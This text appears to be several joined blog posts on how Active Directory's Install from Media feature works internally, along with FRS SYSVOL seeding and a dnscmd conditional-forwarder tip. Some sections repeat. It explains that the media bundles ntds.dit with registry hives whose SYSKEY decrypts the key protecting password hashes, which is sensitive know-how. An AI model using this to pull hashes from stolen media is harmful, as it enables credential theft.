Install from media was first introduced in Windows Server 2003, as a solution to improve the installation experience of newly promoted domain controllers in branch offices mainly (or sites with slow-links where the initial replication could take significant time to complete), but it is actually an important component in many disaster recovery plans I have designed for various customers over the years, As it is a fast and efficient way to re-install a domain controller and get it up to sync, (that’s the proper way to handle a faulting replicas/domain controllers in most cases). The feature has been mostly changed in Windows Server 2008 and later to address the new type of DCs – Read Only Domain Controllers to be supported by Install from media (IFM) or as sometimes referred to as rifm, there has also been some improvements in the ability to produce install from media (IFM) without taking a regular backup.
What dose Install from media (IFM) consist of
Install from media (IFM) contains two important things.
NTDS.DIT (Active Directory Database) – at the time the IFM is generated (Regardless of Windows Server 2003, Windows Server 2008 or later –the NTDS.dit is pretty much unchanged until DCPROMO makes a lot of changes at the becoming domain controller that takes use of the database – it will change the DSA reference and update related “instance specific” information in the hidden table) – How ever this excepts from rifm’s or Read-Only Domain Controller install from media.
SYSVOL (SYSVOL GPT Storage)
Registry (Contains the SYSKEY used to decrypt the PEK (also known as Password Encryption Key) that efficiently ensure that the protection for sensitive information stored in the Active Directory database (Such as Password Hashes) are unique to each instance of the database (read each domain controller) –Note: This doesn’t apply to RODCs .
Sourcing install from media (IFM) using System State and VSS
Sourcing the media used by IFM is different in Windows Server 2003 (all versions) and Windows Server 2008 and later, the difference is the technology used to gather information required. Windows Server 2008 and later is using VSS and VSS Writers for NTDS (Active Directory Domain Services) and a Registry VSS writer to source the required information to construct an IFM – Note: the Registry doesn’t apply to RODCs
Table 1: VSS Writers used by install from media
Name
Description
Guid
Registry Writer
The registry writer is responsible for the Windows registry. Beginning with Windows Vista and Windows Server 2008, the registry writer now performs in-place backups and restores of the registry. On versions of Windows prior to Windows Vista, the registry writer used an intermediate repository file (sometimes called a “spit file”) to store registry data.
In Windows Vista and later, the registry writer does not report user hives.
The writer ID for the registry writer is AFBAB4A2-367D-4D15-A586-71DBB18F8485.
NTDS Writer
Beginning with Windows Server 2003, this writer reports the NTDS database file (ntds.dit) and the associated log files. These files are required to restore the Active Directory correctly.
There is only one ntds.dit file per domain controller, and it is reported in the writer metadata as in the following example:
<DATABASE_FILES path=”C:WindowsNTDS”
filespec=”ntds.dit”
filespecBackupType=”3855″/>
Here is an example that shows how to list components in the writer’s metadata:
<BACKUP_LOCATIONS>
<DATABASE logicalPath=”C:_Windows_NTDS”
componentName=”ntds”
caption=”” restoreMetadata=”no”
notifyOnBackupComplete=”no”
selectable=”no”
selectableForRestore=”no”
componentFlags=”3″>
<DATABASE_FILES path=”C:WindowsNTDS”
filespec=”ntds.dit”
filespecBackupType=”3855″/>
<DATABASE_LOGFILES path=”C:WindowsNTDS”
filespec=”edb*.log”
filespecBackupType=”3855″/>
<DATABASE_LOGFILES path=”C:WindowsNTDS”
filespec=”edb.chk”
filespecBackupType=”3855″/>
</DATABASE>
</BACKUP_LOCATIONS>
At backup time, the writer sets the backup expiration time in the writer’s backup metadata. Requesters should retrieve this metadata by using IVssComponent::GetBackupMetadata to determine whether the database has expired. Expired databases cannot be restored.
If the computer that contains the NTDS database is a domain controller, the backup application should always perform a system state backup across all volumes containing critical system state information. At restore time, the application should first restart the computer in Directory Services Restore Mode and then perform a system state restore.
The writer ID for this writer is B2014C9E-8711-4C5C-A5A9-3CF384484757.
Sourcing install from media (IFM) in Windows Server 2008 and later with NTDSUTIL
Windows Server 2008 introduces a new context in the NTDSUTIL command line tool to give us a built-in tool to produce install from media instead of having us to perform and restore a backup as in Windows Server 2003.
The new context is named “IFM” and is designed to produce install form media IFM for the following cases.
Table 2: NTDSUTIL IFM options
Name
Notes
Source
Destination
Full IFM
Note: If the SYSVOL tree is located at the same volume as the database, its log files and/or the registry – it will still be included in the snapshot but not copied into the IFM media.
Note: The NTDS VSS writer is invoked and as a result of this we can see that the ‘state_col’ in the ‘hiddentable’ in the ntds.dit database are changed to 4. This means a status of a Backed up database. This flag is only set if the NTDS VSS Writer is used and not for legacy backups.
This command can only be performed on a full/writable DCs
This IFM media can only be used to promote full DCs (Technically unless instanceType is changed recursive on all NCs)
Full IFM with SYSVOL
Same as above +
Note: The full SYSVOL tree will be copied to the IFM media, except DfsrPrivate Folders.
This command can only be performed on a full/writable DCs
This IFM media can only be used to promote full DCs (Technically unless instanceType is changed recursive on all NCs)
RODC IFM
Note: The NTDS VSS writer is passed with a “special” secrets flag in this case, performing a delete of all columns in the database that contains a secret attribute, hidden attribute or an attribute that has been marked as “filtered attribute set” in the schema.
Note: That the PEK (Password Encryption Key) is stored in the “pekList” is not marked secret, (it can’t be as it’s the master key used to protect secret attributes/columns) but it’s rather marked as a ‘hidden attribute’ meaning that we at this state has cleared out the master key for decrypting any other secrets in the DB, however those has just also been cleared so this makes it “safe safe”
NTDSUTIL will remove link values for linked attributes that are marked as “filtered attribute set” in the schema (This is not done by the NTDS VSS writer) and if the command is performed on a full/writable DC all objects including NC heads will recursively change InstanceType – clearing the 0x4 – Write Flag.
Note: In Windows Server 2008 R2 a check is performed against the domain functional level (DFL) and is failing the command if we’re below Windows Server 2003 as DFL with “Can’t produce RODC IFM media for down-level instances) According to be this is an error/mistake in the product as RODCs requires Windows Server 2003 forest functional level (FFL) and not DFL – furthermore there is no issues performing RODC IFM media while the DFL is in Windows 2000 Native for example and then rise the FFL to Windows Server 2003 and introduce a RODC using that media created prior to that the FFL was Windows Server 2003.
Experienced administrators can actually by pass this check, but I won’t include those steps here.
This command can be performed on a full/writable DCs as well Read-Only DCs
This IFM media can only be used to promote RODCs
(Technically unless instanceType is changed recursive on all NCs)
RODC IFM with SYSVOL
Same as above +
Note: The full SYSVOL tree will be copied to the IFM media, except DfsrPrivate Folders.
This command can be performed on a full/writable DCs as well Read-Only DCs
This IFM media can only be used to promote RODCs
(Technically unless instanceType is changed recursive on all NCs)
Once the snapshot is performed by the VSS writers, the snapshotted volumes are mounted. There would be one mount point entry for each drive that contains one of the following:
NTDS.dit – Active Directory Database
Log Files – Active Directory Database Log files (Technically never included/copied to the IFM media, but needed by the NTDS writer itself).
Registry – The SYSTEM and the REGISTERY hives (Those are not copied for Read-Only Domain Controller IFM or rifm)
SYSVOL – SYSVOL is only included if request (Full IFM with SYSVOL or RODC IFM with SYSVOL)
That means if all of the above (A,B,C,D) are located at the C: drive, there will only be one mount point for the C: drive mounted, once one or more mount points has been created, the data listed in (A,B,C,D) are copied over to the following structure:
Table 3: IFM on disk structure
Folder Name
Content
Active Directory
NTDS.dit – Active Directory database
Registry
SYSTEM and SECURITY – registry hives (Except for RODCs)
SYSVOL
The full SYSVOL tree – only if requested in NTDSUTIL
Conversations taking place in DCPROMO for Read-Only Domain Controllers.
If a Read-Only Domain Controller (RODC) is being promoted using a RODC media generated from a full DC the following conversations has to take place.
The attribute msDS-hasMasterNCs are moved into msDS-hasFullReplicaNCs
The binary portion of msDsHasInstantiatedNCs is changed from indicating to have writable NCs instanced to have none-writable NCs instanced.
Update msds-NCType:
Schema NC are updated to contain: NCT_SPECIAL_SECRET_PROCESSING
Domain, Configuration NC and any hosted NDNCs are updated to contain: NCT_SPECIAL_SECRET_PROCESSING | NCT_FILTERED_ATTRIBUTE_SET
On any partial NCs (If the DC the IFM was sourced from was a Full DC and GC) are updated to contain: NCT_FILTERED_ATTRIBUTE_SET
Note: Those conversations are only necessary when a RODC is being promoted by IFM media that was converted from a full DC.
Preventing an invalid database to be used by IFM
There are several checks taking place during a DCRPOMO IFM to determine that the database that is used during IFM is valid according to a few rules.
Preventing a Read-Only Domain Controller (RODC) promotion using a none-converted IFM media from a full DC: This is prevented by looking at the instanceType at the domain NC head, If it contains it WRITE flag and a promotion of an RODC is in progress, the promotion fails with: The Install-From-Media promotion of a Read-Only DC cannot start because the specified source database is not allowed. Only databases from other RODCs can be used for IFM promotion of a RODC. (8200)
Preventing a Full/Writable Domain Controller (DC) promotion using a RODC IFM media: This is prevented by looking at the instanceType at the doman NC head, if it doesn’t contain the it WRITE flag and a promotion of a Full/Writable DC is in progress the promotion fails with an error similar to the one above.
If the schema version in the IFM media database used to promote the DC is different from the local machines schema.ini, the builds between the source and the current operating system the IFM media is being used on are considered a mismatch and the promotion will fail.
Preventing secrets to sneak into Read-Only Domain Controller (RDOC) being promoted using IFM
Even if the NTDSUTIL tool makes sure that IFM produced for Read-Only Domain Controllers (RODCs) are completely removed from secret attributes, hidden attributes and attributes that contain the “Filtered Attribute Set” flag, In fact the columns representing those attributes in NTDS.dit and the ‘datatable’ are actually completely removed, and any linked attributes that contain the “Filtered Attribute Set” flag will have their rows deleted from the ‘link_table’.
Note: Those are all physical deleted and don’t end up in the Deleted Objects container in either the IsDeleted or IsRecycled state.
DCPROMO performs an additional check, and ensure that no secrets are present in the NTDS.dit while a RODC is being promoted from IFM, if there is columns in the databse representing any secrets (as mentioned above) those will be deleted.
A final solution to make sure that if there are any secrets left in the DB, the last allocated USN to the database before it was IFM’ed are stored as in every database in the ‘hiddentable’ in the ‘usn_col’ column.
(After that the DB is fully initialized and accepts updates again, new USNs are allocated and this is reflected in the ‘usn_col’) However prior to that the Directory System Agent (DSA) accepts updates again, the value in the ‘usn_col’ are copied over to a new column named ‘usnatrifm’ this column will maintain the USN prior to the promotion of the DC using the IFM media, and remain the same as it was when the IFM media was produced for the entire life time of the database (until the DC is demoted)
This allows replication of secrets to compare the ‘usnatrifm’ with the metadata of the attribute containing the secret being replicated in, if that USN has a higher value than the ‘usnatrifm’ column, the current secret in the database is considered not cached (consider to not be valid) and will be replicated in/writing over the old secret that made it in with the IFM.
The reason for why the ‘usnatrifm’ has to remain for the entire life time of the DC is that secret caching happens on-demand meaning that a secret may made it in with IFM for user account ‘ChristofferA’ and ‘ChristofferA’ moves into the branch where the RODC is placed and authenticates 5 years after it was promoted.
This is the first blog post in a series of posts covering how the “Install from media” feature really works, it’s an in-depth very technical post that explains what happens under the hood and this first part focuses on how it works in Windows Server 2003.
Background
Install from media was first introduced in Windows Server 2003, as a solution to improve the installation experience of newly promoted domain controllers in branch offices mainly (or sites with slow-links where the initial replication could take significant time to complete), but it is actually an important component in many disaster recovery plans I have designed for various customers over the years, As it is a fast and efficient way to re-install a domain controller and get it up to sync, (that’s the proper way to handle a faulting replicas/domain controllers in most cases). There is some common misunderstandings of the concept “Install from media” I terms of if the operation could be performed entirely offline or online, the short answer is: No. It can’t be performed offline; you have to be online with at least one writable domain controller in the same domain as the IFM source is taken from and even then you may not be able to be fully efficient and cause replication to happen over the network anyway, this need some future explanation.
What dose Install from media (IFM) consist of
Install from media (IFM) contains two important things.
NTDS.DIT (Active Directory Database) – at the time the IFM is generated (Regardless of Windows Server 2003, Windows Server 2008 or later –the NTDS.dit is pretty much unchanged until DCPROMO makes a lot of changes at the becoming domain controller that takes use of the database – it will change the DSA reference and update related “instance specific” information in the hidden table )
SYSVOL (SYSVOL GPT Storage)
Registry (Contains the SYSKEY used to decrypt the PEK (also known as Password Encryption Key) that efficiently ensure that the protection for sensitive information stored in the Active Directory database (Such as Password Hashes) are unique to each instance of the database (read each domain controller) –Note: This doesn’t apply to RODCs .
Sourcing install from media (IFM) using System State and VSS
Sourcing the media used by IFM is different in Windows Server 2003 (all versions) and Windows Server 2008 and later, the difference is the technology used to gather information required.
Windows Server 2003 IFM media is generated by performing a system state backup, the reason for this is that we can get a copy of ntds.dit while we’re up and running DsIsNTDSOnline=True (Active Directory is operational) this is archived by the DsBackup API: http://msdn.microsoft.com/en-us/library/ms675896(VS.85).aspx.We will also get a copy of SYSVOL since a system state backup contains the following:
Active Directory
The SYSVOL tree
The Boot.ini file
The COM+ class registration database
The registry
To be more specific the following is required in the system state in order to be able to source IFM:
Active Directory is required.
The SYSVOL tree may be optionally removed. (A specific configuration is required to source the SYSVOL tree during IFM promotion)
The Boot.ini file may be removed.
The COM+ class registration database may be removed.
The registry folder is required. Registry components are required as follows:
The Default file in the Registry folder may be removed.
The SAM file is required.
The SECURITY folder is required.
The SOFTWARE file may be removed.
The SYSTEM file is required.
We’re are responsible for doing a restore of a system state backup or selves to an alternative location, and ensure we gather the required information above. (Optionally if we care about disk size optimization we can not only select the specific components required in the system state backup, but we could also perform a offline defragmentation of the ntds.dit database)
We can only use IFM to promote domain controllers in the same domain as we sourced it from, as well the target domain controller has to be running the same operating system, including service pack and architecture (x86/x64)
Sourcing the NTDS.DIT – Active Directory database from IFM in Windows Server 2003
As explained earlier in this article the Active Directory database (NTDS.dit) is being backup either by the DsBackup API or VSS API – The Active Directory database are unique to each DC and contains the NCs hosted by the DC typically Domain, Schema, Configuration and in some cases NDNC’s also known as application partitions such as DomainDNSZones and ForestDNSZones, if the DC is also a GC it will contain partial information about every object in all domain NCs in the entire forest (a multiple domain forest) – even thou if a DC are a GC in a single domain environment, the domain NC is only stored once in the database, if the sourced database was a GC, the computer being promoted to a DC using the source will also become a GC.
During the backup itself (even if the intent are for IFM) – No changes are made to the database except setting the backup expiration date and backup usn in the hidden record. (Also known has the hidden table). Changes are instead modified/adjusted during DCPROMO on the computer that are about to become a DC using the sourced database from IFM.
Before we can have an in-depth look at the changes that take place inside the Active Directory database during IFM we need to understand the physical layout of the database and some key concepts. (Note: For the purpose of this article the NTDS.dit physical layout will be rather simplified than the real/exact layout for display purposes)
The Active Directory database (NTDS.DIT) contains the following tables.
Contain: Domain, Schema, Config and NDNCs as well partial NCs and basically every object and phantom.
hiddentable
Contains the DSA identity and various related information
linktable
N/A – Out of scope for this article
quota_rebuild_progress_table
N/A – Out of scope for this article
quota_table
N/A – Out of scope for this article
sdproptable
N/A – Out of scope for this article
sd_table
N/A – Out of scope for this article
Ensure the database isn’t out-dated aka older than Tombstone Life Time (TSL)
During DCPROMO the sourced IFM database are verified that it hasn’t passed the Tombstone Life Time (TSL) in the forest, if the database is older than the TSL, the promotion is aborted. This is more specifically measured against the object who had the last USN Change and it’s when-changed date.
Change/Adjust the DSA – Directory Service Agent IdentityThe “hiddentable” also known as the hidden record contains the identity of the local DSA – Directory Services Agent (DC) hosting the instance of the database, this identity points to the DCs NTDSA object within the directory stored within the “datatable”, the ntdsa object in its turn contains necessary information such as the DMD to be able to read the schema and soon. (I will write another article on how this works – more in detail). When it comes to IFM, the DSA identity stored in the hidden record/hidden table still points to the identity of the DC the IFM was sourced from, this cause an issue.The following illustrates the relationship between the DSA identity in the “hiddentable” and the NTDS Settings object stored in the “datatable” – that’s actually the NTDS Settings object you will see under the server object in Active Directory Sites and Services.
Table 2: NTDS.DIT “datatale” (Simplified Version)
So in this example NTTEST-SCH-01 is the DC where we sourced the IFM (backed up the database) – Now how do we get the new identity of the computer being promoted to a DC using the sourced IFM media? Well the new DSA for the computer being promoted is actually created remotely during DCPROMO on another DC (at the DC we perform the initial replication with, specified in the unattended answer file as “ReplicationSourceDC” parameter) , before we can change the record in the “hiddentable” to point to it – we must replicate in the newly created DSA by replicating the Configuration NC – this can cause an issue by itself – If we’re preforming the initial replication with the DC we sourced the IFM from, we’re temporarily presenting us self as the very same DC and replication will fail.
So how are this solved? We’re creating a temporary “dummy” DSA with a corresponding server object in the database, retire invocation IDs, copying all references to NCs hosted by the old DSA (Doing not will have KCC to trigger a deletion of those sourced NCs later on), the temporary “dummy” DSA are created in the any site and the first site in alphabetical order identified.
Now we can re-initialize and successfully replicate in the remotely created DSA by replicate the configuration NC using the temporary “dummy” DSA identity, retire invocation IDs, copying all references to NCs hosted by the temporary “dummy” DSA (Doing not will have KCC to trigger a deletion of those sourced NCs later on) we can now remove the temporary “dummy” DSA and store the real identity of the computer being promoted in the “hiddentable”
We can now re-initialize as our self’s with our real DSA identity and continue processing.
Remove None-Replicated attributes from the database.
Non-replicated attributes (Containing bit 0x00000001 in System-Flags) , such as badPwdCount, Last-Logon, and Last-Logoff are stored on each domain controller, but are not replicated. The non-replicated attributes are attributes that pertain to a particular domain controller, as those attributes contains local information associated with the DC that the IFM was sourced from, those are deleted except the following:
Decrypt and Re-encrypt the Password Encryption Key (PEK)
Secret Data stored within the Active Directory database (NTDS.DIT) such as the password hashes are additionally protected by a Password Encryption Key (PEK) – the PEK are encrypted by the SYSKEY of the DC and are therefore unique to each DC, the sourced NTDS.dit from the IFM contains a PEK encrypted by the SYSKEY from the DC on which the IFM was generated (the computer where the NTDS.dit was backed up). DCPROMO will decrypt the PEK using the SYSKEY (from the DC the IFM was sourced from) from the registry in the restored IFM information as the SYSKEY are stored in the registry (that’s one reason why we need to include parts of the registry in IFM) and then re-encrypt the PEK with the SYSKEY of the computer being promoted to DC.
Diagnostics and Logging
IFM promotions can be identified in the Dcpromo.log and Dcpromoui.log files that are located in the %systemroot%debug folder. There are several entries that can be used to verify that the database where sourced from the IFM and that the promotion did use IFM.
Table 3: DCPROMO.log
DCPROMO.log
07/03 06:35:29 [INFO] Copying restored Active Directory files from C:IFM_MEDIAActive Directoryntds.dit to C:WINDOWSntdsntds.dit… 07/03 06:35:29 [INFO] Copying restored Active Directory files from C:IFM_MEDIAActive Directoryedb00001.log to C:WINDOWSntdsedb00001.log… 07/03 06:35:29 [INFO] Active Directory is initializing the restored database files. This might take several minutes.
Table 4: DCPROMOUI.log
DCPROMOUI.log
dcpromoui AAC.AB0 0271 Enter State::ReplicateFromMedia true dcpromoui AAC.AB0 0272 Enter State::GetReplicationSourcePath C:IFM_MEDIA
Sourcing NDNCs with Windows Server 2003 is only supported by Windows Server 2003 SP1 or later under the following conditions:
Both the DC your souring the IFM from must be running Windows Server 2003 SP1 or later and as well the machine intending to become a DC using the source IFM.
The forest functional level (FFL) has to be: Windows Server 2003 (Pre-Windows Server 2003 FFL adding replicas to NCs has to be done on the Domain Naming Master – FSMO)
Note: The promotion completes with the sourced IFM even if the forest functional level (FFL) is less than Windows Server 2003 but NDNCs aren’t sourced from the IFM and the following will happen:
The following will be logged in the Directory Services Log: “The forest functional level is not high enough to complete addition of application directory partitions during installation of the directory. Therefore specified application directory partitions will not be added to this domain controller during installation. If you would like to make this server a replica of an application directory partition, you could re-add these application partition after the installation is complete.”
The following will be logged in the Directory Services Log, and the DC will begin the process of physically removing the NDCs source from the IFM in the DCs database: “The local domain controller is no longer configured to host the following directory partition. As a result, the objects in this directory partition will be removed from the local Active Directory database.” Note: In this case the DomainDNSZones and ForestDNSZones NDNCs.
The DomainDNSZones and ForestDNSZones are begin replicated in again over the wire using normal replication, as the promoted DC (Sourced from IFM) hosts the DNS Service: As a result of this the DC (Sourced from IFM) has to obtain a new invocationID once again (It has already done this once for using the sourced IFM database instance): Note: This can be confirmed by running the repadmin /showsig command
Default-First-Site-NameNTTEST-SCH-02
Current DC invocationID: 7bbd4543-cf19-44e3-9638-96907ceb8a36 ß Current InvocationID obtained cause of removing/adding NDCs.
28081325-eee8-40b0-9587-9c02867040bc retired on 2011-07-03 07:16:41 at USN 32780 ß New InvocationID representing the sourced IFM restored/promoted as a new instance on the current DC
b7633426-242b-47bf-852c-a07466ef937f retired on 2011-07-03 06:35:39 at USN 16397ß InvocationID representing the instance on the DC where the IFM where sourced
You have to use an unattended answer file specifying the ReplicateFromMedia=Yes parameter as well define the ApplicationPartitionsToReplicate parameter, note this can be used to include specific NDNCs or you can simply include them all by specific a wildcard, Here are some samples:
The File Replication Service (FRS) can source files and folders from the restored system state backup on the first restart after a DCPROMO IFM promotion if the strict dependencies that the File Replication Service (FRS) requires are fulfilled.
The system state backup must contain MD5 checksum data that is used by the File Replication Service (FRS) to determine if a restored file or folder is the same as the file versions on existing domain controllers in the domain.
The File Replication Service (FRS) must have constructed MD5 checksum data for the files in the SYSVOL tree.
For MD5 checksums to exist, files and folders in the SYSVOL tree must have been replicated at least one time after there were two or more domain controllers in the domain (Note: The SYSVOL can never be efficiently sourced from a IFM media also known as System State Backup in Windows Server 2003 unless there is at least two DCs in the domain already present at the point when the IFM media also known as System State Backup is generated). You can trigger FRS to store the MD5 checksum of all files in the SYSVOL tree my writing a script that modifies the files, for example set/un-set the hidden attribute, that simply will tiger a replication.Furthermore the MD5 checksum data is stored in ntfrs.jdb ESE database that’s by default located in “%SystemRoot%ntfrsjet”. The ntfrs.jdb ese database are using 4k pages and have the following layout.Table 5: NTFRS.JDB Database Layout
The MD5 checksum are stored in the IDTable0000X and are stored in the column Spare1Bin.
You can validate the existence of MD5 checksums by using “ntfrsutil idtable > MD5Hash.txt” and search for entries missing hashes.
Table 6: NTFRS.JDB IDTable
IDTable
Table Type: ID Table for DOMAIN SYSTEM VOLUME (SYSVOL SHARE) (1) FileGuid : 790adf00-7709-447d-9a756b655931151b
The SYSVOL part of the IFM media also known as the System State Backup must be restored to the same volume that is chosen to host the SYSVOL tree when you run DCPROMO, or it has to be specified to the same value in your unattended answer file.
Seeding the SYSVOL with IFM at Windows Server 2003:
Even if the SYSVOL are sourced with IFM delta changes are about to be replicated in over the network, there are certain requirements to ensure that this process are being efficient and that not the entire SYSVOL tree are replicated over the network again, once of the requirements has already been discussed in this article regarding MD5 checksums: The File Replication Service (FRS) must have constructed MD5 checksum data for the files in the SYSVOL tree.
The Domain Controller (DC) or File Replication Service Replica (FRS Replica) that the initial replication of the SYSVOL tree takes place with must meet the following requirements
The Domain Controller (DC) or File Replication Service Replica (FRS Replica) that the initial replication takes place with are identified by specifying the “ReplicationSourceDC” parameter in the unattended dcpromo answer file. (Note this can’t be done using the UI)
How to best select the Domain Controller (DC) or File Replication Service Replica (FRS Replica) to perform initial replication with:
Locate a domain controller that has a low number of inbound and outbound connections. This domain controller must not be a significant originator or forwarder of change orders to downstream partners in SYSVOL or FRS-replicated DFS replica sets
Locate a domain controller that doesn’t act as Bridgehead server (those typically have many replication partners)
The File Replication Service (FRS) outbound log on the DC/FRS replica that is used to seed the SYSVOL tree with must be cleared so that a full vvjoin is triggered when the initial synchronization of SYSVOL with the IFM promoted DC occur, the reason for this is that if the outbound log contain cached items, an optimized vvjoin is performed and optimized vvjoin’s doesn’t support pre-staging content, this results in a full replication of the entire SYSVOL tree over the network with the IFM promoted DC instead of delta changes and new files.
How to verify and clear the outlog:
At the intended helper DC (DC chosen to perform initial replication with) run: ntfrsutil outlog to show current entries in the outlog change cache.
Note: See Table 5: NTFRS.JDB Database Layout for the outlog table layout earlier in this article
If the ntfrsutil outlog show’s entries, the outlog needs to be trimmed/reset or if the period of time specified as the “Outlog Change History in Minutes” (by default 7 days) has passed since the IFM media was generated.
Changes the Outlog Change History In Minutes value in the following registry subkey: HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesNtFrsParameters to 0 (zero)
Run ntfrsutl poll /now
Restart the FRS Service on the actual DC/FRS replica: net stop ntfrs | net start ntfrs
Run the ntfrsutil outlog again, the contents of the current outbound log must contain only files that have been modified after you changed the registry and restarted the FRS.
Note: Don’t forget to reset the Outlog Change History In Minutes registry type back to the seven-day default while you’re done with the IFM operations (e.g. all DCs intended to be promoted with IFM has been promoted)
Configure Debug and Analysis logging on the computer that is to be promoted using IFM
Configure Debug Severity on the computer that is about to be promoted using IFM media:
To be able to determine whether files in the SYSVOL tree are being moved in from the pre-staged folder on the local computer or are being replicated over the network from an upstream partner, set the registry value for Debug Log Severity to 4 on the computer being promoting using IFM media in the following registry subjey: HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesNtFrsParameters to 4 Note: This has to be configured before you promote the computer to a DC using IFM.
Verify whether the files in the SYSVOL tree was seeded from the pre-stage folder (the restored IFM media) or replicated over the network.
To find all the files that were replicated from the initial replication partner over the wire (files that wasn’t seeded from IFM), type:
findstr /I “RcsReceivingStageFile” NtFrs_000X.log where X should be the number of the log, in case if multiple logs e.g. NtFrs_0001.log, NtFrs_0002.log etc run the command against both files.
To find all files that were sourced from the pre-staged system state backup, type:
Findstr /I “(218)” NTFRS_000X.log where X should be the number of the log, in case if multiple logs e.g. NtFrs_0001.log, NtFrs_0002.log
For those of you that couldn’t attend Microsoft TechDays 2011 in Sweden on site; I did a session on upgrading a Windows Server 2003 Active Directory environment to Window Server 2008 R2 with a focus on automated processes. The scripts used in this session (also available for download at this blog) were developed by the Enfo Zipper – Directory Services Team and used in a real world scenario to upgrade an enterprise customer’s forest.
This is easy in Windows Server 2008 R2 and later as you can do this simply by selecting the store this conditional forwarder in Active Directory and replicate it as follows: in the DNS Manager when you create a new conditional forwarder
All DNS Servers in this forest
All DNS Servers in this domain
All Domain controllers in this domain (for Windows 2000 compatibility)
If you want to store a conditional forwarder in the DS and let’s say have the replication scope set to: All DNS Servers in this forest. You can still do so but not in the DNS Manager UI, You have to use the dnscmd command line tool as follows:
Run the following command to create a directory integrated conditional forwarding: dnscmd %computername% /zoneadd <ForestRootDomain> /dsforwarder IPtoNS1 IPtoNS2 /DP /forest
Note: If the above command failed it’s most likely because the forwarding zone already existed, either as a file based forwarding zone at one of the DCs in the forest, or already as a ds based forwarding zone. (Note a DS based forwarding can already exist in the scope of: domain, in any domain in the forest, if that’s the case either use /ZoneResetType /DP /forest or delete and re-create the forwarder)